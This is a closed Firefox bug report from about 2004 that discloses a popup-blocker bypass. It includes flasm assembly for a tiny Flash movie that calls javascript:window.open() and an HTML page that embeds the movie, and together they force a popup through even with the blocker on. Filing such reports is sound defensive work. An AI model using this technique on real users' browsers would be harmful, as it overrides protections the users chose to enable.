Closed Bug 283381 Opened 20 years ago Closed 20 years ago

popup blocker bypass using flash file loading javascript:window.open() url

Categories

(Firefox :: General, defect)

Product:
Firefox
Component:
General
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
VERIFIED DUPLICATE of bug 176079

People

(Reporter: henri_torgemane, Assigned: bugzilla)

Details

Attachments

(2 files)

ffp.swf, generated from ffp.flm shown in main description.
278 bytes, application/octet-stream
Details
ffp.html, copy of the html sample in the main description
1.02 KB, text/html
Details 
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0

Found of off www.bigblueball.com
The following is the minimal test case to reproduce it:
<html><head><title>firefox popup bypass test</title></head><body
<!-- ffp.flm: get flasm from flasm.sf.net, then run flasm -a ffp.flm to generate
ffp.swf
movie 'g:ffp.swf' compressed // flash 6, total frames: 1, frame rate: 12 fps, 1x1 px

  frame 0
    push 'javascript:k=window.open(\'', 'url'
    getVariable
    add
    push '\',\'_blank\',\'width='
    add
    push 'width'
    getVariable
    add
    push ',height='
    add
    push 'height'
    getVariable
    add
    push ',top='
    add
    push 'top'
    getVariable
    add
    push ',left='
    add
    push 'left'
    getVariable
    add
    push
',toolbar=no,location=no,scrollbars=no,status=no,resizable=no,fullscreen=no\');
void(0);'
    add
    push ''
    getURL2
  end // of frame 0
end
-->
This shows a popup in firefox 1.0 with popup blocker on.
<embed src="ffp.swf?url=http://slashdot.org/&width=500&height=300&top=200&left=200"
 width=1 height=1 allowScriptAccess="always" type="application/x-shockwave-flash">
</body></html>


Reproducible: Always

Steps to Reproduce:
1. save html sample as ffp.html. 
2. generate ffp.swf from ffp.flm. 
3. load ffp.html.


Actual Results:  
A popup to slashdot.org shows up, regardless of your popup blocker settings.

Expected Results:  
The popup should be blocked.

Since this bug report looks a lot like a cookbook recipe to bypass the popup
blocker, I'm checking the little "confidential" checkbox. 
On the other hand, the info here was found off of a public web page, and this is
not a security bug. 
I'm going on the side of caution, and I apologize if this is a bad use of said
checkbox.
Note development builds have an experimental feature to block these, see later
comments in the bug I'm duping this to.

*** This bug has been marked as a duplicate of 176079 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: